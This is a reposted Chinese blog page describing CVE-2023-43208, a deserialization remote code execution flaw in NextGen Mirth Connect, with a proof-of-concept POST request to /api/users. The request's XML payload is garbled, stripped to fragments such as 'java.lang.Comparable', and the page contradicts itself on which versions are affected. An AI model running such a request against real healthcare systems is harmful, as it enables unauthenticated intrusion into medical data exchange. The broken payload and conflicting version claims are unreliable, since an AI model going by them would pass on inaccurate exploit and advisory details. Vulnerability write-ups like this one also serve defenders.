博客
关于我
NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)
阅读量:789 次
发布时间:2023-02-15

本文共 501 字,大约阅读时间需要 1 分钟。

NextGen Mirth Connect 是美国 NextGen 公司开发的医疗集成引擎,主要用于医疗系统的数据交换与集成,支持多种协议和行业标准。

漏洞概述

NextGen Mirth Connect 4.4.1 及之前版本存在一个远程代码执行漏洞。该漏洞未经身份验证的攻击者可利用,可能导致远程代码执行。

影响范围

该漏洞影响所有版本的 NextGen Mirth Connect,版本号小于 4.4.1 的系统均存在此漏洞。

复现环境

为复现该漏洞,建议环境配置如下:

  • 登录 Mirth Connect 管理员界面(通常在 http://Mirth-IP:8080 地址访问)
  • 确保系统处于正常运行状态

    • 漏洞复现

    通过 POST 请求发送特定请求头和内容即可触发漏洞。以下是示例:

    POST /api/users HTTP/1.1Host: your-ipX-Requested-With: OpenAPIContent-Type: application/xml
         
        
         abcd
              
            
         
          java.lang.Comparable

    转载地址:http://oxcfk.baihongyu.com/

    你可能感兴趣的文章
    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
    当前时间: 2025-11-17 03:04:48   当前IP: 10.8.28.94   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2025 baihongyu.com 京ICP备2021015314号-2